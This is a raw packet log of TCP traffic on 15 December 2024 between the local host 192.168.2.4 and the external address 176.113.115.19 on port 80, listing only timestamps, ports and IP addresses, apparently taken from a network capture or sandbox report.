Dec 15, 2024 09:23:23.733807087 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:23.733882904 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:23.734226942 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:23.853915930 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.079699993 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.079740047 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.079752922 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.079793930 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.079843044 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.079894066 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.079906940 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.079917908 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.079931021 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.079940081 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.079972029 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.080125093 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.080173969 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.080184937 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.080185890 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.080218077 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.199821949 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.199851036 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.199954987 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.272073984 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.272092104 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.272144079 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.319619894 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.319634914 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.319677114 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.319705963 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.392201900 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.392298937 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.392311096 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.392424107 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.440213919 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.440330029 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.440344095 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.440355062 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.440367937 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.440381050 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.440392017 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.440407038 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.440407038 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.440418959 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.440428019 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.440431118 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.440551996 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.440632105 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.440710068 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.440820932 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.440834045 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.440844059 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.440860033 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.440871000 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.440896034 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.440917015 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.463907957 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.463923931 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.464025021 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.466099977 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.466231108 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.466244936 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.466346979 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.473844051 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.473917007 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.473917007 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.473957062 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.481455088 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.481543064 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.481637955 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.481697083 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.512420893 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.512444973 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.512520075 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.515994072 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.516062021 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.516102076 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.516171932 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.560353994 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.560388088 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.560470104 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.560470104 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.564183950 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.564256907 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.564269066 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.564310074 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.571870089 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.571969986 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.572019100 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.572067976 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.579397917 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.579458952 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.579637051 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.579698086 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.587182045 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.587214947 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.587259054 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.587330103 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.594959974 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.595057011 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.595066071 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.595108986 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.602313042 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.602399111 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.602407932 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.602463007 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.608411074 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.608469963 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.608498096 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.608584881 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.614289045 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.614326000 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.614376068 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.614397049 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.619738102 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.619801044 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.619853973 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.625206947 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.625276089 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.625294924 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.625314951 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.630733013 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.630795956 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.630804062 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.630868912 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.636212111 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.636265993 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.636265993 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.636329889 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.656343937 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.656405926 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.656462908 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.656505108 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.657887936 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.657943010 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.658008099 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.658056021 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.663425922 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.663475990 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.663501978 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.663542986 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.669001102 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.669059992 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.669083118 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.669121027 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.674397945 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.674489021 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.674527884 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.674585104 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.680027962 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.680090904 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.680128098 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.680166006 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.685476065 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.685554028 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.685586929 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.685621023 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.690985918 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.691045046 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.691081047 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.691122055 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.696505070 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.696568012 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.696654081 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.696724892 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.702008963 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.702064991 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.702120066 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.702168941 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.707519054 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.707576990 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.707634926 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.707700014 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.713130951 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.713186026 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.713222980 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.713272095 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.718625069 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.718703985 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.718735933 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.718780994 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.724118948 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.724180937 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.724217892 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.724267006 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.729640007 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.729731083 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.729744911 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.729789972 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.735209942 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.735270023 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.735310078 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.735373974 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.739610910 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.739665031 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.739732981 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.739800930 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.743923903 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.743968964 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.743979931 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.744029045 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.748111963 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.748166084 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.748202085 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.748249054 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.752243042 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.752316952 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.752350092 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.752392054 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.756376982 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.756388903 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.756437063 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.760154963 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.760209084 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.760241985 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.760284901 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.763859987 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.763976097 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.764018059 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.764018059 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.767499924 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.767591000 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.767608881 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.767677069 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.771104097 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.771197081 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.771224022 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.771275997 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.774703026 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.774823904 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.774861097 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.774938107 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.778347015 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.778420925 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.778440952 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.778501034 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.781929016 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.782002926 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.782088995 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.782143116 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.785516024 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.785600901 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.848684072 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.848810911 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.848911047 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.848911047 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.849692106 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.849765062 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.849984884 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.850039005 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.851289034 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.851356983 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.851367950 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.851440907 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.853476048 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.853559971 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.853589058 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.853650093 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.855607033 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.855670929 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.855726957 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.855956078 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.857809067 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.857867956 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.857888937 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.857917070 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.859934092 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.860035896 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.860110044 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.860263109 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.862035990 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.862081051 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.862129927 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.862129927 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.864120960 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.864223003 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.864264011 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.864264011 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.866229057 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.866344929 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.866358995 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.866404057 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.868371964 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.868433952 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.868470907 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.868541002 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.870379925 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.870462894 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.870500088 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.870558023 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.872447968 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.872555971 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.872601032 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.872601032 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.874488115 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.874543905 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.874613047 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.874715090 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.876517057 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.876601934 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.876636028 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.876682043 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.878561020 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.878638029 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.878667116 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.878726006 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.880548000 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.880676031 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.880676985 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.880738020 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.882616043 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.882707119 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.882749081 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.882749081 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.884545088 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.884615898 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.884670973 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.884749889 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.886511087 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.886630058 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.886636972 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.886682987 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.888472080 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.888529062 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.888580084 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.888622999 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.890443087 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.890541077 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.890574932 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.890645027 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.892375946 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.892474890 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.892477989 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.892530918 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.894263029 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.894337893 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.894371986 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.894434929 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.896226883 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.896303892 CET	80	49731	176.113.115.19	192.168.2.4
